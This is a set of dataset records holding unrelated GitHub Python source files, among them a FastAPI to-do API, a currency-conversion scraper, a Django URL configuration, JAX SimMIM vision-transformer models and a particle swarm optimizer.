\"Clamperl\" : \"366.png\",\n \"Huntail\" : \"367.png\",\n \"Gorebyss\" : \"368.png\",\n \"Relicanth\" : \"369.png\",\n \"Luvdisc\" : \"370.png\",\n \"Bagon\" : \"371.png\",\n \"Shelgon\" : \"372.png\",\n \"Salamence\" : \"373.png\",\n \"Beldum\" : \"374.png\",\n \"Metang\" : \"375.png\",\n \"Metagross\" : \"376.png\",\n \"Regirock\" : \"377.png\",\n \"Regice\" : \"378.png\",\n \"Registeel\" : \"379.png\",\n \"Latias\" : \"380.png\",\n \"Latios\" : \"381.png\",\n \"Kyogre\" : \"382.png\",\n \"Groudon\" : \"383.png\",\n \"Rayquaza\" : \"384.png\",\n \"Jirachi\" : \"385.png\",\n \"Deoxys\" : \"386.png\",\n \"Turtwig\" : \"387.png\",\n \"Grotle\" : \"388.png\" ,\n \"Torterra\" : \"389.png\" , \n \"Chimchar\" : \"390.png\" , \n \"Monferno\" : \"391.png\" , \n \"Infernape\" : \"392.png\" ,\n \"Piplup\" : \"393.png\" , \n \"Prinplup\" : \"394.png\" , \n \"Empoleon\" : \"395.png\" , \n \"Starly\" : \"396.png\" ,\n \"Staravia\" : \"397.png\" ,\n \"Staraptor\" : \"398.png\" ,\n \"Bidoof\" : \"399.png\" ,\n \"Babarel\" : \"400.png\" ,\n \"Kricketot\" : \"401.png\" ,\n \"Kricketune\" : \"402.png\" ,\n \"Shinx\" : \"403.png\" ,\n \"Luxio\" : \"404.png\" ,\n \"Luxray\" : \"405.png\" ,\n \"Budew\" : \"406.png\" ,\n \"Roserade\" : \"407.png\" ,\n \"Cranidos\" : \"408.png\" ,\n \"Rampardos\" : \"409.png\" ,\n \"Shieldon\" : \"410.png\" ,\n \"Bastiodon\" : \"411.png\" ,\n \"Burmy\" : \"412.png\" ,\n \"Wormadam\" : \"413.png\" ,\n \"Mothim\" : \"414.png\" ,\n \"Combee\" : \"415.png\" ,\n \"Vespiquen\" : \"416.png\" ,\n \"Pachirisu\" : \"417.png\" ,\n \"Buizel\" : \"418.png\" ,\n \"Floatzel\" : \"419.png\" ,\n \"Cherubi\" : \"420.png\" ,\n \"Cherrim\" : \"421.png\" ,\n \"Shellos\" : \"422.png\" ,\n \"Gastrodon\" : \"423.png\" ,\n \"Ambipom\" : \"424.png\" ,\n \"Drifloon\" : \"425.png\" ,\n \"Drifblim\" : \"426.png\" ,\n \"Buneary\" : \"427.png\" ,\n \"Lopunny\" : \"428.png\" ,\n \"Mismagius\" : \"429.png\" ,\n \"Honchkrow\" : \"430.png\" ,\n \"Glameow\" : \"431.png\" ,\n \"Purugly\" : \"432.png\" ,\n \"Chingling\" : \"433.png\" ,\n \"Stunky\" : \"434.png\" ,\n \"Stunktank\" : \"435.png\" ,\n \"Bronzor\" : \"436.png\" ,\n \"Bronzong\" : \"437.png\" ,\n \"Bonsly\" : \"438.png\" ,\n \"Mime Jr.\" : \"388.png\" ,\n \"Happiny\" : \"389.png\" , \n \"Chatot\" : \"390.png\" , \n \"Spiritomb\" : \"391.png\" ,\n \"Gible\" : \"392.png\" , \n \"Gibite\" : \"393.png\" , \n \"Garchomp\" : \"394.png\" , \n \"Munchlax\" : \"395.png\" ,\n \"Riolu\" : \"396.png\" ,\n \"Lucario\" : \"397.png\" ,\n \"Hippopotas\" : \"398.png\" ,\n \"Hippowdon\" : \"399.png\" ,\n \"Skorupi\" : \"400.png\" ,\n \"Drapion\" : \"401.png\" ,\n \"Croagunk\" : \"402.png\" ,\n \"Toxicroak\" : \"403.png\" ,\n \"Carnivine\" : \"404.png\" ,\n \"Finneon\" : \"405.png\" ,\n \"Lumineon\" : \"406.png\" ,\n \"Mantyke\" : \"407.png\" ,\n \"Snover\" : \"408.png\" ,\n \"Abomasnow\" : \"409.png\" ,\n \"Weavile\" : \"410.png\" ,\n \"Magnezone\" : \"411.png\" ,\n \"Lickilicky\" : \"412.png\" ,\n \"Rhyperior\" : \"413.png\" ,\n \"Tangrowth\" : \"414.png\" ,\n \"Electivire\" : \"415.png\" ,\n \"Magmortar\" : \"416.png\" ,\n \"Togekiss\" : \"417.png\" ,\n \"Yanmega\" : \"418.png\" ,\n \"Leafeon\" : \"419.png\" ,\n \"Glaceon\" : \"420.png\" ,\n \"Gliscor\" : \"421.png\" ,\n \"Mamoswine\" : \"422.png\" ,\n \"Porygon-z\" : \"423.png\" ,\n \"Gallade\" : \"424.png\" ,\n \"Probopass\" : \"425.png\" ,\n \"Dusknoir\" : \"426.png\" ,\n \"Frosslass\" : \"427.png\" ,\n \"Rotom\" : \"428.png\" ,\n \"Uxie\" : \"429.png\" ,\n \"Mesprit\" : \"430.png\" ,\n \"Azelf\" : \"431.png\" ,\n 
\"Dialga\" : \"432.png\" ,\n \"Palkia\" : \"433.png\" ,\n \"Heatran\" : \"434.png\" ,\n \"Regigigas\" : \"435.png\" ,\n \"Giratina\" : \"436.png\" ,\n \"Cresselia\" : \"437.png\" ,\n \"Phione\" : \"438.png\" ,\n \"Manaphy\" : \"439.png\" ,\n \"Darkrai\" : \"440.png\" ,\n \"Shaymin\" : \"441.png\" ,\n \"Arceus\" : \"442.png\" ,\n}","repo_name":"KevinLu19/PokemonGame","sub_path":"Pokemon/names.py","file_name":"names.py","file_ext":"py","file_size_in_byte":13851,"program_lang":"python","lang":"hr","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"}
+{"seq_id":"3680875758","text":"from typing import List\nfrom unicodedata import name\nfrom uuid import uuid4\n\nfrom fastapi import Depends, FastAPI, HTTPException, status\nfrom sqlalchemy.orm import Session\n\nfrom database import engine, get_session\nfrom models import Base, TodoList, ListItem\nfrom schemas import ListItemRequest, ListItemResponse, ListRequest, ListResponse\n\nBase.metadata.create_all(engine)\napp = FastAPI()\n\n\n@app.get(\"/\")\ndef read_root():\n \"\"\"\n API information.\n \"\"\"\n return {\"message\": \"Mudapp to-do list, for all your shit.\"}\n\n\n@app.get(\"/list\", response_model=List[ListResponse])\ndef get_all_lists(session: Session = Depends(get_session)):\n \"\"\"\n Return a list of all to-do lists stored by the app.\n \"\"\"\n response = []\n lists = session.query(TodoList).all()\n for list in lists:\n items = session.query(ListItem).filter_by(id=list.id).all()\n list_response = ListResponse(\n id=list.id,\n name=list.name,\n items=[\n ListItemResponse(\n id=item.id,\n name=item.name,\n completed=item.completed,\n due_date=item.due_date if item.due_date else None,\n )\n for item in items\n ],\n )\n response.append(list_response)\n\n return response\n\n\n@app.post(\"/list\", response_model=ListResponse, status_code=status.HTTP_201_CREATED)\ndef create_list(request: ListRequest, session: Session = Depends(get_session)):\n \"\"\"\n Create a to-do list using the request content.\n \"\"\"\n # create list\n todo_list = TodoList(name=request.name)\n session.add(todo_list)\n session.commit()\n\n # create list items\n list_items = []\n if request.items:\n list_items = [\n ListItem(\n name=item.name,\n completed=False,\n due_date=item.due_date,\n id=todo_list.id\n ) for item in request.items\n ]\n session.add_all(list_items)\n session.commit()\n\n return ListResponse(id=todo_list.id, name=request.name, items=list_items)\n\n\n@app.get(\"/list/{id}\", response_model=ListResponse)\ndef get_list(id: int, session: Session = Depends(get_session)):\n \"\"\"\n Return a specific list by ID.\n \"\"\"\n list: TodoList = session.query(TodoList).get(id)\n if list is None:\n raise HTTPException(status_code=404, detail=\"List not found.\")\n\n return ListResponse(id=list.id, name=list.name, items=list.items)\n\n\n@app.put(\"/list/{id}\", response_model=ListResponse)\ndef rename_list(\n id: int, request: ListRequest, session: Session = Depends(get_session)\n):\n \"\"\"\n Rename an existing to-do list.\n \"\"\"\n list: TodoList = session.query(TodoList).get(id)\n if list is None:\n raise HTTPException(status_code=404, detail=\"List not found.\")\n list.name = request.name\n session.commit()\n\n return ListResponse(id=list.id, name=list.name, items=list.items)\n\n\n@app.delete(\"/list/{id}\")\ndef delete_list(id: int, session: Session = Depends(get_session)):\n \"\"\"\n Delete an existing to-do list.\n \"\"\"\n list: TodoList = session.query(TodoList).get(id)\n if list is None:\n raise HTTPException(status_code=404, detail=\"List not found.\")\n session.delete(list)\n session.commit()\n\n return {\"message\": \"List deleted.\"}\n","repo_name":"manudawber/mudapp","sub_path":"mudapp/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"11652327676","text":"import tensorflow as tf\nimport tensorflow_hub as hub\nfrom PIL import Image\nimport numpy as np\nimport argparse\nimport json\n\n\n\n\nimage_path=\"./test_images/\"\n\n\n\n##Load the model\nsaved_model=\"my_model.h5\"\nmodel=tf.keras.models.load_model(saved_model,custom_objects={'KerasLayer':hub.KerasLayer})\nmodel.summary()\n\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-i\",\"--image\", help=\"./test_images/\", required=False, default=1)\nparser.add_argument(\"-m\",\"--model\", help=\"my_model.h5\", required=False,default=2)\nparser.add_argument(\"-k\",\"--top_k\", help=\"top k probs of the image\",required=False, default=3)\nparser.add_argument(\"-c\",\"--category_names\",help=\"classes\",required=False,default=4)\n\nargs = vars(parser.parse_args())\n\nimage_path = args['image']\nsaved_model = args['model']\ntop_k = args['top_k']\ncategory_names = args['category_names']\nimage_size = 224\n\n\n\n# Create the process_image function\ndef process_image(numpy_image):\n print(numpy_image.shape)\n tensor_img=tf.image.convert_image_dtype(numpy_image, dtype=tf.int16, saturate=False)\n resized_img=tf.image.resize(numpy_image,(image_size,image_size)).numpy()\n normal_img=resized_img/255\n\n return normal_img \n\n# Create the predict function\ndef predict(image_path, model, top_k=3):\n #if top_k < 1:\n # top_k = 1\n image = Image.open(image_path)\n image = np.asarray(image)\n image = process_image(image)\n expanded_image = np.expand_dims(image, axis=0)\n probes = model.predict(expanded_image)\n top_k_values, top_k_indices = tf.nn.top_k(probes, k=top_k)\n \n top_k_values = top_k_values.numpy()\n top_k_indices = top_k_indices.numpy()\n \n \n\n return top_k_values, top_k_indices, image\n\n\nif category_names != None:\n with open(category_names, 'r') as f:\n class_names = json.load(f)\n print(\"Classes Values:\")\n top_k_values, top_k_indices = predict(image_path, model, topk=int(top_k))\n # top_k_values, top_k_indices = predict(image_path, model, top_k)\n for idx in top_k_indices[0]:\n print(\"-\",class_names[str(idx+1)])\n\n\nprint('Probabilties:', top_k_values)\nprint('Classes Keys:', top_k_indices) \n \n \n","repo_name":"aldovazquez90/Image_classifier_project_udacity","sub_path":"predict1.py","file_name":"predict1.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"10840948288","text":"import os\nimport requests\nfrom bs4 import BeautifulSoup\nfrom babel.numbers import format_currency\n\nos.system(\"cls\")\n\n\"\"\"\nUse the 'format_currency' function to format the output of the conversion\nformat_currency(AMOUNT, CURRENCY_CODE, locale=\"ko_KR\" (no need to change this one))\n\"\"\"\n\ndef transferwise_crawl(transferurl):\n url = transferurl\n result = requests.get(url)\n soup = BeautifulSoup(result.text, \"html.parser\")\n \n div1 = soup.find(\"span\",{\"class\":\"text-success\"}).string\n \n\n rate = float(div1)\n # print(converted)\n return rate\n\n\ndef crawl():\n url = \"https://www.iban.com/currency-codes\"\n \n iban_result = requests.get(url)\n iban_soup = BeautifulSoup(iban_result.text, \"html.parser\")\n\n table = iban_soup.find(\"table\", {\"class\": \"table table-bordered downloads tablesorter\"})\n\n tbody = table.find(\"tbody\")\n tds = tbody.find_all(\"td\")\n\n information = {}\n length = len(tds)\n key = 0\n country = []\n for i in range(0, length, 4):\n if tds[i + 1].string == \"No universal currency\":\n continue\n else:\n country.append(tds[i].string.capitalize())\n country.append(tds[i + 1].string.capitalize())\n country.append(tds[i + 2].string)\n country.append(tds[i + 3].string)\n information[key] = country\n key = key + 1\n country = []\n\n return information\n\ndef caculator(money, value):\n return money * value\n \ndef main():\n country_dic = crawl()\n print(\"Welcome to CurrencyConvert PRO 2000: \\n\")\n\n for i in range(len(country_dic)):\n print('# {} {}'.format(i, country_dic[i][0]))\n\n print(\"Where are you from? Choose a country by number.\\n\")\n from_num = int(input(\"#: \"))\n print(f\"{country_dic[from_num][0]}\\n\")\n\n print(\"Now choose another country.\\n\")\n another_country_num = int(input(\"#: \"))\n print(f\"{country_dic[another_country_num][0]}\\n\")\n\n while (True):\n try:\n print(f\"How many {country_dic[from_num][2]} do you want to convert to {country_dic[another_country_num][2]}\")\n money = int(input())\n break\n except:\n print(\"That wasn't a number.\\n\")\n continue\n\n\n transfer_url = \"https://transferwise.com/gb/currency-converter/\"+ str(country_dic[from_num][2].lower())+\"-to-\"+str(country_dic[another_country_num][2].lower())+\"-rate\"+\"?amount=\"+str(money)+\"#rate-alerts\"\n value = transferwise_crawl(transfer_url)\n result = caculator(money, value)\n\n print(format_currency(money,country_dic[from_num][2],locale=\"ko_KR\")+\" is \",end='')\n print(format_currency(result,country_dic[another_country_num][2],locale=\"ko_KR\"))\n\nmain()","repo_name":"cheonjiwan/python_challenge","sub_path":"assignment/Day6.py","file_name":"Day6.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"34366372883","text":"from scripts.hackerrank.fizzBuzz import fizzBuzz\n\nclass Test:\n test_cases = [\n [15, [1, 2, \"Fizz\", 4, \"Buzz\", \"Fizz\", 7, 8, \"Fizz\", \"Buzz\", 11, \"Fizz\", 13, 14, \"FizzBuzz\"]]\n ]\n testable_functions = [fizzBuzz]\n\n def test_fizz_buzz(self):\n for f in self.testable_functions:\n for case, expected in self.test_cases:\n assert f(case) == expected\n\n ","repo_name":"TrellixVulnTeam/learning_to_test_code_BL81","sub_path":"tests/hackerrank/test_fizzBuzz.py","file_name":"test_fizzBuzz.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"12232321199","text":"import random\n\n#create a list of all movies for the game\nlistofmovies=['avengers endgame','star wars the force awakens','avengers infinity war','jurassic world','the lion king','furious seven','black panther','harry potter',\n'frozen','beauty and the beast','incredibles two','iron man three','minions','aquaman','aladdin','finding dory','zootopia','spectre','spider man homecoming','batman v superman','hunger games'\n]\n#list of all vowels to remove everything except them from the name of the movie \nvowels=['a','e','i','o','u']\n#list of alphabets of 'hollywood' to cut them one by one everytime the user makes a wrong guess\nstring=['h','o','l','l','y','w','o','o','d']\n\n#choosing random movie from list of movies\nchoosen=random.choice(listofmovies)\n'''okay so quite a bit to explain here...\nfirst we remove the spaces from the name of movie using the split function which splits the string from there is a space\n'''\nremove_spaces=choosen.split(' ')\n\n'''secondly we take the previous variable and put a '/' where there was a space in the name using the join function\nif you feel it is too many functions, don't fret just head over to python docs to read about every function that I have used here'''\n\nchoosen='/'.join(remove_spaces)\n\n#create empty list to get the final string that is formatted to our desire\ntoshow=[]\n\ntempstring=string\nfor x in choosen:\n if x in vowels:\n toshow.append(x)\n elif x=='/': \n toshow.append('/')\n else:\n toshow.append('_')\n","repo_name":"vandanrohatgi/HW-python-project","sub_path":"task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"35597809308","text":"from django.urls import path\nfrom .views import (\n ItemListView,\n AddToCartView,\n OrderDetailView,\n AddCouponView,\n PaymentView,\n ItemDetailView,\n OrderItemDeleteView,\n OrderQuantityUpdateView,\n AddressListView,\n AddressCreateView,\n AddressUpdateView,\n AddressDeleteView,\n CountryListView,\n RegionListView,\n CityListView,\n UserIDView,\n OrderHistoryView,\n )\n\nurlpatterns = [\n path('products/', ItemListView.as_view(), name='product-list'),\n path('products//', ItemDetailView.as_view(), name='product-detail'),\n path('add-to-cart/', AddToCartView.as_view(), name='add-to-cart'),\n path('order-summary/', OrderDetailView.as_view(), name='order-summary'),\n path('order-items//delete/', OrderItemDeleteView.as_view(), name='order-item-delete'),\n path('order-items/update-quantity/', OrderQuantityUpdateView.as_view(), name='order-item-update-quantity'),\n path('add-coupon/', AddCouponView.as_view(), name='add-coupon'),\n path('addresses/', AddressListView.as_view(), name='address-list'),\n path('checkout/', PaymentView.as_view(), name='checkout'),\n path('order-history/', OrderHistoryView.as_view(), name='order-history'),\n path('user-id/', UserIDView.as_view(), name='user-id'),\n path('addresses/create/', AddressCreateView.as_view(), name='address-create'),\n path('addresses//update/', AddressUpdateView.as_view(), name='address-update'),\n path('addresses//delete/', AddressDeleteView.as_view(), name='address-delete'),\n path('countries/', CountryListView.as_view(), name='countries'),\n path('regions/', RegionListView.as_view(), name='regions'),\n path('cities/', CityListView.as_view(), name='cities'),\n]\n","repo_name":"kyleherring180/DjangoReactEcommerce","sub_path":"backend/src/core/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"42466113523","text":"# preprocess data\n\ndef preprocess_data(load_data_path: InputPath(str), \n preprocess_data_path: OutputPath(str)):\n \n # import Library\n import sys, subprocess;\n subprocess.run([\"python\", \"-m\", \"pip\", \"install\", \"--upgrade\", \"pip\"])\n subprocess.run([sys.executable, '-m', 'pip', 'install','pandas'])\n subprocess.run([sys.executable, '-m', 'pip', 'install','scikit-learn'])\n import os, pickle;\n import pandas as pd\n import numpy as np\n from sklearn.model_selection import train_test_split\n\n #loading the train data\n with open(f'{load_data_path}/all_data', 'rb') as f:\n ntrain, all_data = pickle.load(f)\n \n # split features and label\n all_data_X = all_data.drop('label', axis=1)\n all_data_y = all_data.label\n \n # Reshape image in 3 dimensions (height = 28px, width = 28px , channel = 1)\n all_data_X = all_data_X.values.reshape(-1,28,28,1)\n\n # Normalize the data\n all_data_X = all_data_X / 255.0\n \n #Get the new dataset\n X = all_data_X[:ntrain].copy()\n y = all_data_y[:ntrain].copy()\n \n # split into train and test\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)\n \n #creating the preprocess directory\n os.makedirs(preprocess_data_path, exist_ok = True)\n \n #Save the train_data as a pickle file to be used by the modelling component.\n with open(f'{preprocess_data_path}/train', 'wb') as f:\n pickle.dump((X_train, y_train), f)\n \n #Save the test_data as a pickle file to be used by the predict component.\n with open(f'{preprocess_data_path}/test', 'wb') as f:\n pickle.dump((X_test, y_test), f)\n \n return(print('Done!'))","repo_name":"chasecadet/ezaf","sub_path":"pipelines/v1 /containerized_python_components/digit-recognition-kaggle-competition/components/GPT_files /preprocess_data /preprocess_data.py","file_name":"preprocess_data.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"13512145256","text":"import dataclasses\nfrom typing import Any, Tuple\n\nimport einops\nimport jax.numpy as jnp\nfrom flax import linen\n\nfrom .HiViT import HierarchicalViT\nfrom .SwinV2 import SwinTransformerV2\nfrom .ViT import VisionTransformer\n\n\nclass WindowedNorm(linen.Module):\n target_size: Tuple[int]\n window_size: int = 47\n\n def get_targets_count(self):\n window_shape = (self.window_size, self.window_size)\n padding = (\n (self.window_size // 2, self.window_size // 2),\n (self.window_size // 2, self.window_size // 2),\n )\n\n targets_count = jnp.ones((1, self.target_size[0], self.target_size[1], 1))\n\n targets_count = linen.avg_pool(\n targets_count,\n window_shape=window_shape,\n strides=(1, 1),\n padding=padding,\n count_include_pad=True,\n )\n targets_count = targets_count * jnp.power(self.window_size, 2.0)\n targets_count = jnp.int32(jnp.rint(targets_count))\n return targets_count\n\n def setup(self):\n self.targets_count = self.variable(\n \"simmim_constants\",\n \"targets_count\",\n self.get_targets_count,\n ).value\n\n def __call__(self, targets):\n window_size = self.window_size\n\n window_shape = (window_size, window_size)\n padding = (\n (window_size // 2, window_size // 2),\n (window_size // 2, window_size // 2),\n )\n\n targets_ = targets\n\n targets_square = jnp.power(targets, 2.0)\n\n targets_mean = linen.avg_pool(\n targets,\n window_shape=window_shape,\n strides=(1, 1),\n padding=padding,\n count_include_pad=False,\n )\n targets_square_mean = linen.avg_pool(\n targets_square,\n window_shape=window_shape,\n strides=(1, 1),\n padding=padding,\n count_include_pad=False,\n )\n\n targets_var = targets_square_mean - jnp.power(targets_mean, 2.0)\n targets_var = targets_var * (self.targets_count / (self.targets_count - 1))\n targets_var = jnp.maximum(targets_var, 0.0)\n\n targets_ = (targets_ - targets_mean) / jnp.sqrt(targets_var + 1.0e-6)\n\n return targets_\n\n\nclass SwinTransformerV2ForSimMIM(SwinTransformerV2):\n def setup(self):\n super().setup()\n\n token_init = linen.initializers.normal(0.02)\n self.mask_token = self.param(\"mask_token\", token_init, (1, 1, self.embed_dim))\n\n def __call__(self, x, mask, train: bool = False):\n x = self.patch_embed(x)\n\n B, L, _ = x.shape\n mask_token = linen.dtypes.promote_dtype(self.mask_token, dtype=self.dtype)[0]\n mask_tokens = jnp.broadcast_to(mask_token, (B, L, self.embed_dim))\n mask = jnp.reshape(mask, (B, L, 1)).astype(mask_tokens.dtype)\n x = x * (1.0 - mask) + mask_tokens * mask\n\n x = self.pos_drop(x, deterministic=not train)\n\n for layer in self.swin_body:\n x = layer(x, train=train)\n\n x = self.norm(x)\n\n B, L, C = x.shape\n H = W = int(L**0.5)\n x = jnp.reshape(x, (B, H, W, C))\n return x\n\n def get_stride(self):\n return self.patch_size * 2 ** (len(self.depths) - 1)\n\n\nclass VisionTransformerForSimMIM(VisionTransformer):\n def setup(self):\n super().setup()\n\n token_init = linen.initializers.normal(0.02)\n self.mask_token = self.param(\"mask_token\", token_init, (1, 1, self.embed_dim))\n\n def __call__(self, x, mask, train: bool = False):\n x = self.patch_embed(x)\n\n B, L, _ = x.shape\n mask_tokens = jnp.broadcast_to(self.mask_token, (B, L, self.embed_dim))\n mask = jnp.reshape(mask, (B, L, 1)).astype(mask_tokens.dtype)\n x = x * (1.0 - mask) + mask_tokens * mask\n\n x = self.pos_emb(x)\n\n for layer in self.vit_body:\n x = layer(x, train=train)\n\n x = self.norm(x)\n\n B, L, C = x.shape\n H = W = int(L**0.5)\n x = jnp.reshape(x, (B, H, W, C))\n return x\n\n def get_stride(self):\n 
return self.patch_size\n\n\nclass HierarchicalViTForSimMIM(HierarchicalViT):\n def setup(self):\n super().setup()\n\n token_init = linen.initializers.normal(0.02)\n self.mask_token = self.param(\"mask_token\", token_init, (1, 1, self.embed_dim))\n\n def __call__(self, x, mask, train: bool = False):\n x = self.patch_embed(x)\n\n B, L, _ = x.shape\n H = W = int(L**0.5)\n mask_token = linen.dtypes.promote_dtype(self.mask_token, dtype=self.dtype)[0]\n mask_tokens = jnp.broadcast_to(mask_token, (B, L, self.embed_dim))\n mask = jnp.reshape(mask, (B, H, W, 1)).astype(mask_tokens.dtype)\n mask = self.patch_embed.patches_reshape(mask)\n x = x * (1.0 - mask) + mask_tokens * mask\n\n for layer in self.vit_body:\n x = layer(x, train=train)\n\n x = self.norm(x)\n\n B, L, C = x.shape\n H = W = int(L**0.5)\n x = jnp.reshape(x, (B, H, W, C))\n return x\n\n def get_stride(self):\n return 16\n\n\nclass SimMIM(linen.Module):\n encoder: linen.Module = SwinTransformerV2ForSimMIM\n encoder_stride: int = 32\n\n patch_size: int = 4\n\n enable_windowed_norm: bool = False\n norm_patch_size: int = 47\n\n dtype: Any = jnp.float32\n\n @linen.compact\n def __call__(self, x, mask, train: bool = False):\n z = self.encoder(x, mask, train)\n x_rec = linen.Conv(\n features=self.encoder_stride**2 * 3,\n kernel_size=(1, 1),\n dtype=self.dtype,\n )(z)\n x_rec = einops.rearrange(\n x_rec,\n pattern=\"... h w (c b1 b2) -> ... (h b1) (w b2) c\",\n b1=self.encoder_stride,\n b2=self.encoder_stride,\n )\n\n mask = jnp.expand_dims(\n jnp.repeat(\n jnp.repeat(mask, self.patch_size, axis=1),\n self.patch_size,\n axis=2,\n ),\n axis=-1,\n )\n\n B, H, W, C = x.shape\n if self.enable_windowed_norm:\n x = WindowedNorm(target_size=(H, W), window_size=self.norm_patch_size)(x)\n\n x_rec = linen.dtypes.promote_dtype(x_rec, dtype=x.dtype)[0]\n loss_recon = jnp.abs(x - x_rec)\n loss = jnp.sum(loss_recon * mask) / (jnp.sum(mask) + 1e-5) / C\n\n return loss, x_rec\n\n @classmethod\n def build(cls, config, **kwargs):\n encoder = config.encoder.build(config.encoder, **kwargs)\n\n config = dataclasses.asdict(config)\n config = {key: kwargs[key] if key in kwargs else config[key] for key in config}\n config[\"encoder\"] = encoder\n config[\"encoder_stride\"] = encoder.get_stride()\n return cls(**config)\n\n def extend_parser(self, parser):\n parser = self.encoder.extend_parser(parser)\n parser.add_argument(\n \"--enable-windowed-norm\",\n action=\"store_true\",\n help=\"Use windowed norm of input images as reconstruction target in SimMIM\",\n )\n return parser\n\n def should_decay(self, path, _):\n if path[0].key == \"encoder\":\n return self.encoder.should_decay(path[1:], _)\n\n is_kernel = path[-1].key == \"kernel\"\n verdict = is_kernel\n return verdict\n\n\ndef simmim_swinv2_tiny():\n config = {\n \"embed_dim\": 96,\n \"depths\": (2, 2, 6, 2),\n \"num_heads\": (3, 6, 12, 24),\n }\n encoder = SwinTransformerV2ForSimMIM(**config)\n\n config = {\n \"encoder\": encoder,\n \"encoder_stride\": encoder.get_stride(),\n \"patch_size\": encoder.patch_size,\n }\n return SimMIM(**config)\n\n\ndef simmim_swinv2_base():\n config = {\n \"embed_dim\": 128,\n \"depths\": (2, 2, 18, 2),\n \"num_heads\": (4, 8, 16, 32),\n }\n encoder = SwinTransformerV2ForSimMIM(**config)\n\n config = {\n \"encoder\": encoder,\n \"encoder_stride\": encoder.get_stride(),\n \"patch_size\": encoder.patch_size,\n }\n return SimMIM(**config)\n\n\ndef simmim_swinv2_large():\n config = {\n \"embed_dim\": 192,\n \"depths\": (2, 2, 18, 2),\n \"num_heads\": (6, 12, 24, 48),\n }\n encoder = 
SwinTransformerV2ForSimMIM(**config)\n\n config = {\n \"encoder\": encoder,\n \"encoder_stride\": encoder.get_stride(),\n \"patch_size\": encoder.patch_size,\n }\n return SimMIM(**config)\n\n\ndef simmim_vit_small():\n config = {\n \"num_layers\": 12,\n \"embed_dim\": 384,\n \"mlp_dim\": 1536,\n \"num_heads\": 6,\n }\n encoder = VisionTransformerForSimMIM(**config)\n\n config = {\n \"encoder\": encoder,\n \"encoder_stride\": encoder.get_stride(),\n \"patch_size\": encoder.patch_size,\n }\n return SimMIM(**config)\n\n\ndef simmim_vit_base():\n config = {\n \"num_layers\": 12,\n \"embed_dim\": 768,\n \"mlp_dim\": 3072,\n \"num_heads\": 12,\n }\n encoder = VisionTransformerForSimMIM(**config)\n\n config = {\n \"encoder\": encoder,\n \"encoder_stride\": encoder.patch_size,\n \"patch_size\": encoder.patch_size,\n }\n return SimMIM(**config)\n\n\ndef simmim_hivit_tiny():\n config = {\n \"depths\": (1, 1, 10),\n \"embed_dim\": 96,\n \"mlp_ratio\": (3.0, 3.0, 4.0),\n \"num_heads\": (None, None, 6),\n }\n encoder = HierarchicalViTForSimMIM(**config)\n\n config = {\n \"encoder\": encoder,\n \"encoder_stride\": encoder.get_stride(),\n \"patch_size\": encoder.patch_size,\n }\n return SimMIM(**config)\n\n\ndef simmim_hivit_small(**kwargs):\n config = {\n \"depths\": (2, 2, 20),\n \"embed_dim\": 96,\n \"mlp_ratio\": (3.0, 3.0, 4.0),\n \"num_heads\": (None, None, 6),\n }\n encoder = HierarchicalViTForSimMIM(**config)\n\n config = {\n \"encoder\": encoder,\n \"encoder_stride\": encoder.get_stride(),\n \"patch_size\": encoder.patch_size,\n }\n return SimMIM(**config)\n","repo_name":"SmilingWolf/JAX-CV","sub_path":"Models/SimMIM.py","file_name":"SimMIM.py","file_ext":"py","file_size_in_byte":9908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"16589553675","text":"\"\"\"\nImporting necessary libraries.\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\"\"\"\nClass to represent a function to be minimized.\n\"\"\"\nclass function:\n def func(x):\n return((x[1][0]-x[0][0])**4 + 12*x[0][0]*x[1][0] - x[0][0] + x[1][0] - 3)\n\n\"\"\"\nFOllowing class represnts a particle in population.\n\"\"\"\nclass particle(function):\n \"\"\"\n Following function initializes a particle's parameters.\n \"\"\"\n def __init__(self):\n self.x = np.random.rand(2,1)\n self.v = np.random.rand(2,1)\n self.p = self.x\n self.x_arr = []\n self.x_arr.append(self.x)\n self.level_set = []\n self.level_set.append(function.func(self.x))\n \nclass PSO(function):\n \"\"\"\n Following function initializes the swarm based on provided parameters.\n \"\"\"\n def __init__(self,epochs,d,w,c1,c2):\n self.swarm = []\n self.best = []\n self.worst = []\n self.average = []\n for i in range(d):\n par = particle()\n self.swarm.append(par)\n self.d = d\n self.w = w\n self.c1 = c1\n self.c2 = c2\n self.epochs = epochs\n self.g = None\n for i in range(d):\n if(i == 0):\n self.g = self.swarm[0].x\n elif(function.func(self.g)>function.func(self.swarm[i].x)):\n self.g = self.swarm[i].x\n \n \"\"\"\n Following function generates a new swarm for each iteration and essentially minimizes the function.\n \"\"\"\n def minimize(self):\n for i in range(self.epochs):\n for j in range(self.d):\n r = np.random.uniform(0.01,1,(2,1))\n s = np.subtract(np.ones((2,1)),r)\n self.swarm[j].v = np.add(np.add(np.multiply(self.w,self.swarm[j].v) , np.multiply(self.c1,np.multiply(r,np.subtract(self.swarm[j].p,self.swarm[j].x)))),np.multiply(self.c2,np.multiply(s,np.subtract(self.g,self.swarm[j].x))))\n self.swarm[j].x = self.swarm[j].x + self.swarm[j].v\n self.swarm[j].x_arr.append(self.swarm[j].x)\n self.swarm[j].level_set.append(function.func(self.swarm[j].x))\n 